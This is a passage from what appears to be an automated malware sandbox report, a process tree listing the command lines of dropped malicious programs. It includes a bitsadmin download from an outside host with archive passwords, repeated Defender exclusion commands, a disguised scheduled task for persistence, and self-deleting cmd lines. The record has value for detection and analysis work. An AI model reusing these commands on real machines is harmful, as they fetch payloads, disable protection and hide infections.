        C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:4632
        
        C:\Users\Admin\AppData\Roaming\1620243161582.exe
        
        "C:\Users\Admin\AppData\Roaming\1620243161582.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620243161582.txt"
        8⤵
        Executes dropped EXE
        
        PID:3832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe"
        8⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:5092
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe"
        7⤵
        
        PID:5652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        
        PID:4416
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:6124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe & exit
        5⤵
        
        PID:5588
      - C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        6⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe & exit
        5⤵
        
        PID:4112
      - C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe
        6⤵
        Executes dropped EXE
        
        PID:5512
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:5480
      - C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:5768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Blocklisted process makes network request
        Executes dropped EXE
        
        PID:5800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1592
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:6048
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:4616
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pYteES4lQZFgwzl9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1480
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psYh2fEpZVkJfYf1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:7548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Executes dropped EXE
        
        PID:7740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        7⤵
        
        PID:6224
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        8⤵
        Drops file in System32 directory
        
        PID:6708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1496
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        
        PID:1684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:4076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4304

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DBB44301BDC819CF733853A069EBA1F2 C
  2⤵
  - Loads dropped DLL
  PID:5012
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3BC7BB8157CA4D3E91857813C72CC18C
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4556
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5976
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B3FCDA38F13E92097B17F4045B620BEE E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:2228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5828

C:\Users\Admin\AppData\Local\Temp\C41.exe
C:\Users\Admin\AppData\Local\Temp\C41.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4220

C:\Users\Admin\AppData\Local\Temp\19EE.exe
C:\Users\Admin\AppData\Local\Temp\19EE.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5460

C:\Users\Admin\AppData\Local\Temp\2C9C.exe
C:\Users\Admin\AppData\Local\Temp\2C9C.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:3788
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4644
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  PID:4104
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 2C9C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2C9C.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im 2C9C.exe /f
      4⤵
      Kills process with taskkill
      PID:5580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:4916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 1484
  2⤵
  - Program crash
  PID:5068

C:\Users\Admin\AppData\Local\Temp\3140.exe
C:\Users\Admin\AppData\Local\Temp\3140.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4712
- C:\Users\Admin\AppData\Local\Temp\3140.exe
  "C:\Users\Admin\AppData\Local\Temp\3140.exe"
  2⤵
  - Executes dropped EXE
  PID:5372

C:\Users\Admin\AppData\Local\Temp\3529.exe
C:\Users\Admin\AppData\Local\Temp\3529.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4956

C:\Users\Admin\AppData\Local\Temp\3932.exe
C:\Users\Admin\AppData\Local\Temp\3932.exe
1⤵
- Executes dropped EXE
PID:4492
- C:\Windows\SysWOW64\at.exe
  "C:\Windows\System32\at.exe"
  2⤵
  PID:1360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c aOfiOrAQXMwQbejRxngsEXftIiahnVRVsrHIboQugmloFLOHTjdLTJSxnlnHKhswVymzxEzkHortNunX & C:\Windows\System32\cmd.exe < Viscere.xll
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe
    3⤵
    PID:5244
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^btwCyeafUCTExwKGoPydOFoWmoEwfCqEVKpycYOURJeGZvjryQEabMASVyrWbsqaBgJKSEkpqlnyDCWrWBVnXIippdpdUSbAIKt$" Lunga.xll
      4⤵
      PID:7244
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
      Mutato.exe.com f
      4⤵
      Executes dropped EXE
      PID:4676
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com f
        5⤵
        Executes dropped EXE
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:5772
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:6840
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:6516
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      Runs ping.exe
      PID:6284

C:\Users\Admin\AppData\Local\Temp\5229.exe
C:\Users\Admin\AppData\Local\Temp\5229.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:4948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:4472
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4512
- C:\Users\Admin\AppData\Local\Temp\5229.exe
  "C:\Users\Admin\AppData\Local\Temp\5229.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5184
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5229.exe"
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe
    "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    PID:5240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      Executes dropped EXE
      PID:4104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6092
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:5444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5476
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4364
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6568
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:2928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:4644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:7220
  - - C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      4⤵
      Executes dropped EXE
      PID:7668
    - - C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d42665a1-3eee-4464-bd1a-fcd220873064\AdvancedRun.exe" /SpecialRun 4101d8 7668
        5⤵
        
        PID:7740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe
      "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe"
      4⤵
      Executes dropped EXE
      PID:8144
    - - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:8160
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1492
  2⤵
  - Program crash
  PID:4828

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5928

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5672

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4520

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2776

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5168

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
